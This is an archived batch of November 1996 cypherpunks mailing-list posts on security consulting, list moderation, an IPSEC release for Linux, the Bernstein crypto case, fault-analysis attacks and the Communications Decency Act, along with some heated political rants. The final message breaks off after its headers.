From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Sat, 2 Nov 1996 18:10:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Computer Security Risk Assessment Software?
Message-ID: <9611030210.AA29337@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:44 PM 11/1/96 -0800, Dale Thorn <dthorn@gte.net> allegedly wrote:

>Frank Willoughby wrote:

>> The solutions to the above-mentioned problems are:
>> Shop around.  Find out which consultants are qualified and what they charge.
>> Make sure the consultant caps his cost.  You should know the maximum
price tag
>> associated with the consulting engagement BEFORE the consultant walks in
the front
>> door.  This helps to avoid having the consultant camp on your doorstep at
$XXX
>> dollars per hour for days, weeks, or months on end.
>
>The above is a nice ideal.  You should of course get a "really good"
consultant,
>and even better, get one who's "real honest".  But my guess is those guys
cost the
>most of all, or at the very least, require the most research to find.

Good point.  To help establish the honesty, it wouldn't hurt to get personal
and business references.  It also wouldn't hurt to check the BBB (Better 
Business Bureau - a consumer rights group) to see if there are any complaints 
against the company.  Ideally, the consultanting company would also be in the 
BBB's Care program which means that they will submit to binding arbitration 
in the event of a disagreement.  (BTW, the BBB also investigates all claims 
to weed out claims made by one competitor against another, etc.).


>The ideal of capping the cost is commendable as well, however, when the
consultant
>finds midway through the project that his initial estimate (made as
carefully as he
>possibly can) is way too low, he will now have an incentive to lie, cut
corners,etc.,
>*particularly* if the customer looks like one of those antsy types who
might withhold
>payments and so on.

Depends on the consulting company.  It is also a good measure which can be 
used to separate the weasels from the good guys.  The weasels will do exactly 
what you said.  The good guys won't.  Granted that once in a while, there will
be a contract which will have some surprises in it and you - won't make as 
much money as you were supposed to.  IMHO, this is a part of doing business.
Usually, you will win, but once in a while you will lose.  These things will 
happen.  Learn what went wrong and take steps to make sure it doesn't happen 
again.  Then go back to succeeding.

BTW, I think it is the customer's right to withhold payments until the job 
has been performed to the customer's satisfaction.


>My advice:  Get a consultant to find a good IT consultant.  Seriously.

If you have the money to spend, this may be a good idea.  Personally, I 
would tend to separate IT consultants from InfoSec consultants.   InfoSec 
is a highly specialized field & seasoned InfoSec Officers don't exactly 
grow on trees (as companies who don't have one and are trying desparately
to find one will testify).  Seasoned InfoSec Officers who are consulting 
for customers are even rarer, but I would rather have that to have the
security of my corporation depend on an IT consultant who has never had 
any experience working as an Information Security Officer (who has 
successfully implemented Information Security in a real business 
environment).  There is no substitute for experience, IMHO.

Food for thought.

Best Regards,


Frank
Any sufficiently advanced bug is indistinguishable from a feature.
	-- Rich Kulawiec

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.

Fortified Networks Inc. - Information Security Consulting 
http://www.fortified.com     Phone: (317) 573-0800     FAX: (317) 573-0817     
Home of the Free Internet Firewall Evaluation Checklist







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 2 Nov 1996 19:35:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Compromise proposal
Message-ID: <199611030331.VAA00885@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


[this goes to cypherpunks@toad.com and freedom-knights@jetcafe.org. I am
not reading f-k, but I am interested in Dave Hayes's opinion.]

Hi,

I am not normally considered an ally of Dimitri Vulis, so let this
be an attempt at being impartial.

Many members of cypherpunks list are right when they oppose the forced
unsubscription of Dimitri Vulis from this list. The sorry state of this
list is not the result of his flames alone, there is a large number of
people who discuss things of no cryptographic relevance.

We should remember that besides flames and scandals, Vulis has been
posting things that are most relevant to this list's topic.

We should also remember that individuals have the right and
responsibility to define what content they want to see and what content
they do not want to see. I am surprised at libertarians putting
forward propositions that are intended to promote welfare of "new
subscribers" and try to shield them from "lies".

Similarly, individuals are free to create voluntary moderated
associations as they see fit. As it was created, this mailing list was
not a moderated association.

At the same time, unfortunately, flames that Dimitri generated had
rendered previously 80% unusable list to be 99% unusable. These flames
had zero value for me personally. Since cypherpunks is a private list
(although it used to be unmoderated), I can understand the list owner
who wants to save his creature from total destruction.

I propose the following:

	1) The block on Dimitri Vulis's subscriptions should be removed

	2) We should not impose any limitations on anyone's speech except 3)

	3) Dimitri and everyone else should put prefix "[FLAME]" 
           into all Subject: header fields of their flame-related 
	   messages.

	4) The sole discretion of determining what is flame and what 
	   is not should be exercised by John Gilmore. His definition of
	   "flame" can be as broad as reasonably necessary.

	5) John Gilmore should have the right to forsibly unsubscribe, 
	   for a period not exceeding two months, anyone who posts
	   flames and does not use the right prefix.

	6) Cypherpunks list owner shall have the right to install any filters
	   he considers necessary in order to catch and review any messages
	   before they go to all subscribers, solely in order to verify 
	   their compliance with item 3). Messages that do not comply
	   may be rejected and their authors can be unsubscribed, as defined
	   in 5).

This solution will allow anyone with a clue to use appropriate filtering
and improve the signal-noise ratio, and at the same time will not in any
way limit anyone's freedom of speech.

I am also eagerly awaiting when Perry creates a moderated cypherpunks list.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 2 Nov 1996 17:59:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Very Preliminary release of IPSEC code for Linux (fwd)
Message-ID: <Pine.LNX.3.95.961102220001.217A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Fri, 01 Nov 1996 01:32:11 +0200
From: John Ioannidis <ji@hol.gr>
To: ipsec@TIS.COM
Subject: Very Preliminary release of IPSEC code for Linux

-----BEGIN PGP SIGNED MESSAGE-----

Content-Type: text/plain; charset=us-ascii

Greetings!

The Linux IPSP implementation I have been working on lately is finally at a 
stage where it can benefit from feedback, and also where other may also 
benefit from it. This is NOT an untar-and-play release; far from it. It is 
being made available so that it can reach the UnP stage faster than if only I 
work on it.

The code compiles into a loadable module for the 2.0.xx (I'm running 2.0.24) 
kernel. Use at your own risk. I won't be held responsible even if it mails the 
contents of your filesystems to the NSA and the KGB (or whatever), and then 
proceeds to encrypt them :-)

The gzip-ed tar file is in:

	http://prometheus.hol.gr/~ji/ipsec-0.2.tar.gz

If you want to mirror it to your ftp site, please drop me a note. 

Enjoy!

/ji


-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQCVAgUBMnk2+c+A0YctPurVAQFSSAQAkt6e6a8TiYNcZ0rcLnxzIjm3uUTyYP3W
sUaM9hkMYsDbePdc/O9GoA5Q/HnAg4/BNl+Tla1Os72NCq+uDZX2gDnlUFktnd9b
q3S961FIL+ilmV0TepmQGGImjXPpThWMg4FKK7bhaiymcepJ7xs43sJoFEfkQ+uZ
iUxTEo2j1Ro=
=ztQp
-----END PGP SIGNATURE-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Murray Hayes" <mhayes@infomatch.com>
Date: Sun, 3 Nov 1996 02:41:33 -0800 (PST)
To: "cypherpunks" <hallam@ai.mit.edu>
Subject: Re: FDA_dis
Message-ID: <199611031041.CAA04063@infomatch.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 29 Oct 1996 17:51:56 -0500, Hallam-Baker wrote:

>Declan McCullagh wrote:
>> 
>> I'll have to reread John's piece tomorrow (I'm on vacation right now), but
>> it doesn't surprise me. He and I have been arguing about this topic via
>> email for the last week or so. He takes the traditional liberal view of
>> government regulation of drugs is necessary; I take the more libertarian one.
>> 
>> The Cato Institute, BTW, will be putting together a roundtable on this soon.
>> 
>> -Declan
>
>Characterising this as the "traditional liberal view" is somewhat
>misleading,
>its not as if Bob Dole or Newt Gingrich would disagree much. The
>argument is
>more over which special interest group is to be advantaged by changes in 
>regulation. If I was a citizen of a country where the government was
>elected
>by a billion dollars of corporate contributions I might be a
>libertarian.

Are you saying that you are anti-corporation?  That would make
no sense.  Many corporations are very benificial to society.  Take
Shell for example.  It did all that it could to save the life of
that guy in Nigeria, but the "libertarians" who instantly boycotted
Shell would have you belive that they encouraged the sentence.


>Its important to remember that its the World Wide Web and not simply
>limited
>to the US. As long as US companies set up subsidiaries in Europe they
>will be constrained by European law. In the net.age law is becomming a
>major
>export for many countries. 

What is becoming a major export?  Weak laws?  Why would a country 
encourage criminals to come to it's boarders?

>Regulation is not necessarily anti-commerce. UK beef farmers would be
>better
>off today if there had been more regulation, a weak "free-market"
>attitude 
>to public health has destroyed the entire industry.

I don't think you have analysed the situation.  It was the regulating
that deystroyed the UK cattel industry and put the entire world at
risk.  The British government protected the beef industry despite a
ban on British beef accross Europe.  If Eroupe is considered to be the
"Free Market" as you suggest, then it would be exactly opposite to what
you have suggested.  The "Free Market" labled the animals coming from
Britian to be of questionable quality.  The regualtors in Britian 
disaggreed because it would cost them a few penny's to slauter the 
infected heards.  Then Britians started getting sick.  The rest of the
world throws up bans of British beef; Yet the British regulators still
do not cleanse the heards.  The only way to ensure the desease is gone
is to kill every last cow in Britian and bring in fresh stock.  THAT
MEANS NO GIVING THEM TO INDIA YOU STUPID FUCKS.

 It is often in a
>companies
>commercial interest to voluntarily agree to be regulated. Microsoft
>recently 
>signed an agreement to be bound by the European computer privacy
>regulations 
>because by doing so they gained a business advantage - people would
>trust 
>them with their data.

This is another interesting point.  Why is it better for a company to
agree to any regulation?  Do you REALLY trust Microsoft?  I do not.
They write poor code.  They probably signed the aggreement because they
knew that there product was so bad that it couldn't violate any 
restrictions or they contracted the work out to the NSA who wrote the
code for them and so they know that it can be cracked if they need to 
track down every last copy of the OS for their marketing group to do a
statistical analysis on.


>
>Much of the advertising regulation being discussed is private, agreement
>on
>standard formats for image placements for example. There is existing
>government
>regulation of advertising in many countries however. In particular much 
>stricter control over advertising of drugs, making misleading statements
>in
>advertising and so on.In the UK  there is regulation of advertising
>through
>the advertising standards council which is a voluntary body in the sense 
>that it has no statutory enforcement powers but has practical authority 
>because the publishers will not publishe ads that fall foul of its
>decisions.

I belive that this is the GOVERNMENT body called the BBC.  We have a 
similary group up here called the Communist Broadcast Corporation.
Actually, I must be fair to them,  I do like Air Farce.  I don't think
your argument holds any water.  Different cultures have different social
norms.  I was quite shocked to see John Clease stark f**king naked on a
tea commercial (isn't tea a carrier of caffine? yes. Does caffine change
the way in which you body works? yes.  Is caffine food? no; therefore 
caffine is a drug and tea carries that drug.) 

>
>A more serious problem however is likely to be dramatically different
>cultural norms. In the US people expect to be lied to in adverts. In
>countries
>where there is regulation of advertising there is a general expectation
>for comparisons to be fair and for ads to be truthful. I'm just waiting
>for a major corporation to create an Intel scale PR disaster by applying
>sleasly US style marketing techniques in markets where the downside is
>very large. One recent example is Hoover which had a $30 odd million 
>debacle over a "free flights" giveaway that was based on sleasly US
>style
>marketing techniques. The company ended up having to live up to the
>spirit of its offer rather than the letter as it intended simply to
>preserve the value of the brand.

So?  All this proves is that the US is more oreiented toward the free 
market than other places.  In the free market, on's "brand value" is 
incredibly important.  I think you are also missing the distinction
between a company and it's marketing.  I'm sure Hoover, as in your
example, has many marketing camnpaines going on at any time and that
every so often an overeager director of the comapany that Hoover hired
to do the campain makes a mistake.  I'm sure this happens all the time,
just take a look at another marketing company: Microsoft.

>
>If you don't believe in anti trust laws there is no basis on which you
>can object to the sort of regulation by cabal that the advertising
>standards council represents. Of course such cabals cannot exist in the
>libertarian belief system since their existence is denied a-priori 
>by invoking the spirit of Milton Freedman. Milton Freedmen is of course
>a rightwing ecconomist whose theories are widely admired by free
>market ecconomists who admire Mitlon Freedman.

Does that mean a libertarian is more Free Market oriented or more
Command Market oriented?  I'm not sure there is any correlation at
all.  I belive in anti trust laws, does that mean I can object to 
regualtions?


mhayes@infomatch.com

It's better for us if you don't understand
It's better for me if you don't understand
                                             -Tragically Hip





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sat, 2 Nov 1996 22:23:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Telling quote from Bernstein hearing
Message-ID: <Pine.3.89.9611022225.A214-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


In the recent hearing of the Bernstein case, Anthony Coppolino for the 
Justice Department said:


"We don't care about the theory; we don't care about
the idea Mr. Bernstein has, which was to take a particular type
of algorithm and use it to allow for an encrypted interactive
conversation.  That's his idea.
We don't care about his idea; we care about the
result of what it can do."
http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/Legal/
960920.transcript

Encrypted interactive conversations seem to be something to be concerned 
about...They are afraid of us.

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 2 Nov 1996 23:28:07 -0800 (PST)
To: Hard Media <zaid@hardnet.co.uk>
Subject: Re: 'what cypherpunks is about' [RANT]
In-Reply-To: <v01520d01ae9fa0242dde@[158.152.61.59]>
Message-ID: <327C3B0F.2CCA@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Hard Media wrote:
> Message 1/40  From Timothy C. May
> We mine the copper they have no money to mine and pay them with worthless trinkets
> like penicillin, schools, and roads. We are exploiting them. Yep, they are better
> off in a state of natural grace, eating grubs and with a life expectancy of 35.

> I can't believe I'm hearing this. Buddy can you even READ? Have you forgotten that
> the Americas was doing fine until the Europeans got there and "civilised" it?
> Go and read a few books, try  "Bury My Heart at Wounded Knee" - J Dee  and then try
> "Blackfoot Physics" by F David Peat.

[snippo snippo]

Remember the cute little phrase about London?  "It's lovely at this time of year, if
you like fog", etc.  To paraphrase, "The U.S. is a lovely place to live, if you like
rednecks".  If you like men who drive jacked-up pickup trucks that get 10 miles per
gallon of petrol (cheap at $1/gallon), and who deliberately run over anything that
gets in their way on the road, you'll love us (U.S.).

You certainly can't argue that our leaders aren't gentlemen (hee hee); after all,
my near-term ancestors, led by Gen. W.T. "Burn 'em" Sherman, were committed to total
genocide of the South to "win" their "civil" war by any means necessary.

Following similar logic was Teddy Roosevelt, then the mad fire-bombers of World War 2,
capped by the ultimate terrorist fire-bombing of all at Hiroshima and Nagasaki, then
by immense fire-bombing of Vietnam, Cambodia, Laos, etc., followed by prodigious fire- 
bombing of Iraq and a deliberate fire-bombing and massacre of retreating troops at the
end of the "Gulf War".  Fighting the U.S. can be literal Hell!

And lest anyone try to stop these fascist coward bullies, look at the Zapruder film
for the result.  Eyewitnesses said the president's head shot sounded like a melon
thrown against a brick wall.  Splat!  "Oswald" did it with a Carcano?  Yeah, sure.

Quick, how many times have you heard this pro-interference argument?  The pro- people
will even show "proof" that the "savages" (it actually says this in the United States
Declaration of Independence) were as mean to each other as the invaders were to them.
What they fail to say, however, is that the "meanness" in such things as human sacrifice 
and so forth were imported to native cultures by "god-like" superiors who descended on
the locals to "help" them to the next level of technology and hero-worship.  Fooey!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 2 Nov 1996 23:13:32 -0800 (PST)
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: Discrete logs 1 [non-cryptography related annecdote]
Message-ID: <19961103071134640.AAD224@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 31 Oct 1996 09:16:26 -0800, Hal Finney wrote:

>properties than regular logarithms, but I thought this bit of history
>would spark some memories in old-timers and give a new perspective for
>younger people.


It's kind of funny how quickly they dropped out of usage. I'm probably one of
the estimated 7 people under the age of 30 who actually know how to use one. 
(Long story - it involves a couple months in a math class w/o a decent
calculator)  I was in an Algebra class taught by 'Father Time' - interesting
facial expression when he first noticed my 'calculator' (similar to the one
he got when I blurted out the [correct] answer to a problem he'd been
explaining while I was reading a book and ignoring him - in retrospect, RAH
was more educational).  We had to take some sort of state math test and I had
just gotten my new programable graphing calculator a week or two before (more
lost sleep - with a little creativity and a boring class you can get some
interesting code on those thingies) but for some reason I decided to bring
both calculator (the allowability of which was highly suspect) and sliderule.
 The proctor saw me and had a major fit -- over the sliderule!  Yeap, in the
state of California they don't let algebra students use a sliderule to
'cheat' on the assessment test.  They do, however, allow you to use a modern
graphing calculator with programs and an equation solver (Did I mention the
optional IR link?).


The same thing goes on with SATs and especially SAT-IIs.   Some higher-end
calculators, esp. HPs, have plugin cartridges which automate much of the
basic work in chemistry, physics, etc.  I never saw anyone who used such
things even get asked about it.  Do we even need social engineering with
people this stupid?

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 2 Nov 1996 23:28:18 -0800 (PST)
To: Martin Minow <minow@apple.com>
Subject: Re: New Bihman-Shamir Fault Analysis Paper
In-Reply-To: <v03007800aea040ab78e7@[17.202.40.158]>
Message-ID: <327C4114.238F@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Martin Minow wrote:
> There is an inherent conflict between two claims that are
> central to the fault-analysis paper(s):
> "the secret key [is] stored in a tamperproof cryptographic device" and
>    "the cryptographic key is stored in an asymmetric type of
>     memory, in which induced faults ..."

> If the device is truly tamperproof, the attacker should not
> be able to induce faults.  Even given susceptable "consumer-
> quality" devices, it would be trivial to store the cryptographic keys
> in a redundant memory configuration, such as ECC "error-correcting
> code" memory that can self-correct a range of failures and detect
> a much wider range. It would also seem reasonable to protect the
> cryptographic core (algorithms and data) with a digital signature
> that would "crash" the device, rather than proceed with incorrect key information.

[snip]

My comment is about the last item here.  Doesn't "crash" assume normal use, and/or
that the device would have to be processed in an expected sort-of thread so that it
would be able to initiate the crash response?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 3 Nov 1996 00:28:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Thank you, John Gilmore, for protecting freedom of speech against Dr. Dmitri Vulius [RANT]
In-Reply-To: <199611021445.GAA00213@abraham.cs.berkeley.edu>
Message-ID: <327C4C35.1FD8@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


John Anonymous MacDonald wrote:
> Thank you, John, for being so brave and protecting our freedom of
> on-topic speech. You are a true cypherpunk.
> Thank you, Timothy C May, for advancing cryptography by posting 100%
> crypto-relevant messages about loans to other countries and your
> collection of assault weapons.
> John and Timothy just made the cypherpunks list better.

I hate to butt in (and if you believe that....), but, you'll notice (as in anti-gun and
other people-protecting legislation) that it didn't accomplish much, since "Doctor" 
Vulis gets his stuff out to the list anyway.

Ironic how the list championed flooding Germany(?) with material in response to their
suppression of certain "objectionable" material, then gets into this sticky wicket.

But there's probably a logical reason for taking this "action", although it can
apparently be easily circumvented, even though many of us don't understand what
that logic could be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 3 Nov 1996 00:28:18 -0800 (PST)
To: Frank Willoughby <frankw@in.net>
Subject: Re: Computer Security Risk Assessment Software? [RANT]
In-Reply-To: <9611030210.AA29337@su1.in.net>
Message-ID: <327C5610.74DA@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Frank Willoughby wrote:
> At 05:44 PM 11/1/96 -0800, Dale Thorn <dthorn@gte.net> allegedly wrote:
> >Frank Willoughby wrote:
> >> The solutions to the above-mentioned problems are:
> >> Shop around.  Find out which consultants are qualified and what they charge.
> >> Make sure the consultant caps his cost.  You should know the maximum price tag
> >> associated with the consulting engagement BEFORE the consultant walks in the front
> >> door.  This helps to avoid having the consultant camp on your doorstep at $XXX
> >> dollars per hour for days, weeks, or months on end.

> >The above is a nice ideal.  You should of course get a "really good" consultant,
> >and even better, get one who's "real honest".  But my guess is those guys cost the
> >most of all, or at the very least, require the most research to find.

> Good point.  To help establish the honesty, it wouldn't hurt to get personal
> and business references.  It also wouldn't hurt to check the BBB (Better
> Business Bureau - a consumer rights group) to see if there are any complaints
> against the company.  Ideally, the consultanting company would also be in the
> BBB's Care program which means that they will submit to binding arbitration
> in the event of a disagreement.  (BTW, the BBB also investigates all claims
> to weed out claims made by one competitor against another, etc.).

Personal and business references that you can check out are a good start, but beware
of expecting much from org's such as BBB, etc.  The reasons are twofold:

1. Most org's today are (despite the fact that they have computers on their desks)
   extremely shy about picking sides in computer software business matters, because,

2. Unlike nearly any other business, software development/implementation is not
   predictable in many situations like house or bridge building.  Costs and hours
   may run many times what was estimated, unless the up-front estimate was so
   exhaustive (paid for, huh?) that it could be relied on as usably accurate.

   The fact is, the more cookie-cutter the project is, the more likely it will meet
   estimates.  Unfortunately, most customers don't want cookie-cutter for a number
   of reasons, one being the reluctance to pay for old (tried and true) technology.

> >The ideal of capping the cost is commendable as well, however, when the consultant
> >finds midway through the project that his initial estimate (made as carefully as he
> >possibly can) is way too low, he will now have an incentive to lie, cut corners,etc.,
> >*particularly* if the customer looks like one of those antsy types who might withhold
> >payments and so on.

> Depends on the consulting company.  It is also a good measure which can be
> used to separate the weasels from the good guys.  The weasels will do exactly
> what you said.  The good guys won't.  Granted that once in a while, there will
> be a contract which will have some surprises in it and you - won't make as
> much money as you were supposed to.  IMHO, this is a part of doing business.
> Usually, you will win, but once in a while you will lose.  These things will
> happen.  Learn what went wrong and take steps to make sure it doesn't happen
> again.  Then go back to succeeding.
> BTW, I think it is the customer's right to withhold payments until the job
> has been performed to the customer's satisfaction.

Another qualified OK - you may be able to identify the weasels all right, but if you
expect the "good guys" to absorb all cost overruns for way-inaccurate estimates, well,
maybe they will on the phase of the project that they have a solid committment to,
but then they'll still leave you with a dead end product if it costs them way too much,
and they'll do it legally, and they won't need you as a reference anyway, since they
will have other satisfied customers.  And with all this, it still comes down to the
fact that a comprehensive, thorough, and accurate estimate on a significant computer
project is either impossible, or it'll cost way more than a customer will want to
pay for.  You already know if you've been to court that telling the "honest truth"
will not get you the best result many times, so it shouldn't surprise anyone that
these kinds of projects would not bring out the most honest side of people.

[snip]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sun, 3 Nov 1996 08:00:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Response to PFF's O'Donnell on the CDA and moralists
Message-ID: <Pine.GSO.3.95.961103080016.3614D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Sun, 3 Nov 1996 07:58:58 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: Response to PFF's O'Donnell on the CDA and moralists

Richard O'Donnell from the Progress and Freedom Foundation writes in an
essay attached below:

 > The strategic error of civil libertarians in the fight over the
 >censorship act was to lump together the statist moralists and the
 >anti-statist moralists. The latter are natural allies of the free
 >speechers (for the same reason the Christian Coalition and
 >Libertarians call the Republican party home). The ACLU crowd was
 >unable to create a free speech alliance with Christians because they
 >failed to acknowledge that attempts to limit the availability of
 >pornography is very American.

O'Donnell makes some good points elsewhere, but the above fails to
convince me. Trying to impose your moral code on others through the power
of law has a long history in America: Prohibition and sodomy laws. We also
have a long history of discrimination against gays, blacks, and jews. But
that doesn't make it right, or justified. 

Gutting the First Amendment though state action, which the religious right
did in passing the CDA, is indeed "unAmerican." It goes against the very
principles of free expression and tolerance for political dissent upon
which this country was founded. There is a difference between arguing that
people should decline to purchase erotica or read "indecent"  materials --
and calling for criminal laws to ban it.

I agree with O'Donnell that advocates of freedom need to work with
advocates of a reduced central government. One protection against future
threats like the CDA is to make the Federal government less subsceptible
to special interest lobbying. And certainly, House Republicans have
emerged this year as the staunchest defenders of civil liberties.

But I disagree with his assertion that "a small group of statist
moralists" supported the CDA. My question is: what major theocratic right
group publicly opposed it? Even PFF senior fellow Arianna Huffington
debated Esther Dyson and John Perry Barlow and defended the CDA. 
 
The Christian Coalition certainly supported the act. Enough is Enough! 
supported the CDA, with its leader Dee Jepsen testifing in favor of
Net-censorship. (Jepsen is on the board of regents of Pat Robertson's
Regents University and has impeccable religious right credentials.)  Bruce
Taylor's group did -- and though Taylor isn't exactly a religious
moralist, he rarely crosses swords with them. The ACLJ -- the religious
right's response to the ACLU -- supported the CDA and even cited Rimm's
study this year as support for its constitutionality. The organizations in
the umbrella group National Coalition Against Pornography supported the
CDA. The Family Research Council and Focus on the Family continue to argue
in favor of the CDA. Longtime Christian Coalition ally Sen. Charles
Grassley introduced a bill worse than the CDA. We all know what Rep. Henry
Hyde did with the final legislation. 
 
Now, this is from memory. Perhaps some groups have changed their position
after the June ruling. But I'd be interested in hearing the answer to my
question above. 

-Declan

----------
  
        Freedom to Pray and Sin
 
 The Internet is driving the ACLU and Christian Coalition Together
 
        Richard F. O'Donnell
 
 Prohibition became law because bootleggers, who stood to gain
 economically from outlawing alcohol, quietly supported the
 "religious" crusade against evil liquor. Today, the forces of state
 control who want the government to regulate Cyberspace quietly
 support the moral crusade against pornography on the Internet.
 This modern day "Bootleggers and Baptists" coalition has driven a
 stake through the traditional civil libertarian constituency and
 left the ACLU crowd completely bewildered.
 
 The Communications Decency Act, passed by Congress earlier this
 year and now being challenged in court, criminalizes the
 transmission and posting of indecent material on line. In the year of
 the Republican Congressional Revolution a Democrat (James Exon of
 Nebraska) was the prime sponsor of the censorship act. Opponents
 were never able to label it purely a move by "Newt Gingrich's
 radical freshmen" because so many Democrats supported it (and
 Gingrich did not). For instance, a recent WIRED magazine article
 entitled "The Rogues Gallery" that profiled "the legislators who
 helped make government censorship a reality on the Internet"
 didn't profile even one Republican.
 
 Liberal legislators and President Clinton, who normally have few
 problems with the ACLU and abhor the "radical Christian right,"
 went right along with them in attempt to increase state control.
 How is it legislators who voted against efforts to ban flag burning
 on the grounds of free speech suddenly voted to ban dirty pictures?
 
 Simply put, the Democrats saw in the censorship act a way to
 assert government regulation of the Internet, the first step in letting
 Washington bureaucrats regulate Cyberspace in the "public
 interest."  These liberal paternalists intuitively favor state control
 in the mode of Senator Bob Kerry, who thinks that, because the
 FCC regulates telephone and television transmission, it is a natural
 extension of its powers to regulate the Internet. These are members
 of an elite who believe that government is in a better position than
 parents to determine the programming content of television
 networks or in a better position than the market and to determine
 the standards for emerging technology.
 
 Defenders of free speech lost their battle over the censorship act
 because, when their traditional Democratic allies abandoned
 them, they were unable to get over their distaste for moralism and
 recognize their new natural allies. The key to victory for civil
 libertarians is understanding that moralists (e.g. "the Christian
 right") are not a unified, monolithic front.
 
 There is a small group of statist moralists who are seeking
 government power in order to impose their views on the rest of
 America. They may pose a threat to free speech. Yet most
 "Christian activists" are not interested in imposing anything on
 others. Instead, they are actively opposing a government that
 is abridging their rights to freedom of faith. Statist moralists
 advocate not just a silent moment in school but a school led prayer.
 Anti-statist moralists just want schools to stop distributing condoms
 because it undermines the lessons they are trying to teach their
 children about abstinence until marriage.
 
 The strategic error of civil libertarians in the fight over the
 censorship act was to lump together the statist moralists and the
 anti-statist moralists. The latter are natural allies of the free
 speechers (for the same reason the Christian Coalition and
 Libertarians call the Republican party home). The ACLU
 crowd was unable to create a free speech alliance with Christians
 because they failed to acknowledge that attempts to limit the
 availability of pornography is very American.
 
 The legacy of the Puritans remains strong in our nation. Throughout
 our history Americans have been ready to demand conformity and
 to impose through law moral standards (recall abolition - for
 which America went to war). Foes of the Internet censorship lost
 their battle by labeling their opponents "unAmerican." Steve
 Guest, a network consultant who is party to a class action suit
 against attempts to shut down on-line adult sites, summed up the
 civil libertarian attitude when he said such actions were
 "violating the basic principles on which this country was founded."
 
 Calling attempts to regulate pornography "unAmerican" does not
 sway many people - especially Congressmen. Moral crusades
 against sinful material are as quintessentially American as
 individual liberty. Civil libertarians need to acknowledge the
 natural place of moralism in American life. Otherwise, they blind
 themselves from recognizing their true enemy. Freedom isn't
 threatened by moralism - we are free precisely because we are
 moral beings. Freedom is threatened by the advocates of state
 control.
 
 Civil libertarians need to reach out to anti-statist moralists and
 show them that it is no better to let the government in our computers
 than our churches. The way to fight pornography is on individual
 computer screens, with technology that empowers parents to
 determine what their children see - not what some invisible
 bureaucrat or court decides is appropriate.
 
 
 -----------
        Richard F. O'Donnell
 
 Richard F. O'Donnell is Director of Communications at The
 Progress & Freedom Foundation. He serves as editor of all
 Foundation policy reports, books and articles. In addition, he is
 responsible for media relations and public outreach. His editorials
 have appeared in Investor's Business Daily, The Washington
 Times and Commonsense.
 
 Mr. O'Donnell is currently assisting former Congressman Vin
 Weber on his book about the new political majority emerging in
 American politics. He has also worked with columnist Arianna
 Huffington, author Marvin Olasky, and numerous policy and
 Congressional leaders in the telecommunications, health care,
 energy, environment and welfare reform fields.
 
 Mr. O'Donnell is a recognized authority on the nature and political
 ramifications of the transition from the Industrial Age to the
 Digital Age. Writing and speaking on the survivability of the
 American Idea in the 21st Century, he is a columnist for the
 cyberspace magazine Upside Online.
 
 He was managing producer of a weekly television show, The
 Progress Report , co-hosted by Heather Higgins and House
 Speaker Newt Gingrich, and editor of the American Civilization.
 Mr. O'Donnell has also worked at the National Policy Forum: A
 republican Center of the Exchange of Ideas and at the Archer
 Daniels Midland Company.
 
 A native of Colorado, Mr. O'Donnell is a graduate of the Colorado
 College, and has studied at Boston College and The London
 School of Economics and Political Science.

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 3 Nov 1996 09:37:18 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Telling quote from Bernstein hearing
In-Reply-To: <Pine.3.89.9611022225.A214-0100000@netcom9>
Message-ID: <327CD6F3.6CD6@gte.net>
MIME-Version: 1.0
